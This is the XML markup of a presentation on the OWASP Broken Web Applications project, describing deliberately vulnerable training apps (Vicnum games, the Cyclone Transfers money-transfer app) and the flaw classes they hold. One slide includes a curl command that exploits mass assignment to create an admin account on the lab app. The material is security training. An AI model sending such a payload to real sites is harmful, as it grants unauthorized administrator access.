              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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13339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41FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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33392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41FAB-DDC0-4C8D-A2C0-9BFAD0961D10}"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336159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41FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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A299-4B70-44C0-9573-A40A0A56C89D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355061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7200" y="76200"/>
            <a:ext cx="4724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41FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/14/2014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A299-4B70-44C0-9573-A40A0A56C89D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317530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0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="8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2013.appsecus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vicnum.ciphertechs.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fridaygoldsmith/bwa_cyclone_transfer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owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyclone.ciphertechs.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vicnum.ciphertechs.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Nicole.becher@owasp.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Mordecai.Kraushar@owasp.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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Broken Web Application Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4495800"/>
            <a:ext cx="6096000" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Bad Web Apps are Good</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998091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OWASP BWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“Training </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Applications”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Web Goat (multiple platforms)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Damn Vulnerable Web Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“Real applications” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>OWASP Vicnum project </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cyclone Transfers		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Older (broken) versions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>applications/frameworks such as WordPress and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Joomla</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4191000" y="3352800"/>
            <a:ext cx="1725706" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="85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191000" y="3733800"/>
            <a:ext cx="1725706" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="85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684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Vicnum</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Flexible, realistic, vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>useful to auditor’s honing their web application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>skills</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>And anyone else needed a web security primer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>as a hacker challenge for several security events including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://2013.appsecusa.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PERL/PHP apps available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Sourceforge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Guess the number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Guessnum)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Guess the word (Jotto)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Union Challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ruby on Rails apps available on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cyclone Transfers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/fridaygoldsmith/bwa_cyclone_transfers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Usually available live at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://vicnum.ciphertechs.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>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79022"/>
            <a:ext cx="8350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069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 of Vicnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8382000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>A game to review in Vicnum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Jotto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The computer will think of a five letter word with unique letters. After you attempt to guess the word, the computer will tell you whether you guessed the word successfully, or how many of the letters in your guess match the computer's word. Keep on submitting five letter words until you have guessed the computer's word.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Where do we start?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What methodology?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What tools?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What are we after?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3563264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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo of Vicnum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Jotto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another OWASP project:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ZAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2499098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Hacking Vicnum </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are input fields sanitized?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoors in the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Administration and Authentication issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The question of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encryption and encoding issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Business logic and the human element</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2157083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Cyclone Transfers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ruby on Rails Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Available on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>git://github.com/fridaygoldsmith/bwa_cyclone_transfers.git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>fictional money transfer service,  that consists of multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities including: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>mass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>assignment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>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05200"/>
            <a:ext cx="2133600" cy="231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337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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo of Cyclone Transfers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1467222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Cyclone Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Mass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>assignment allows Rails web apps to set many attributes at once </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Rails is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>convention-heavy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and certain fields </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>like :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>admin, and :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>public_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> are easily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>guessable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>curl -d   "user[email]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mo@abc.com&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[password]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>password&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>password_confirmation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>password&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mo&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>]=true" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/cyclone/users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Many Rails based web sites were exploited in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>2012 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>via the mass assignment vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1519887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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A look at other BWA apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
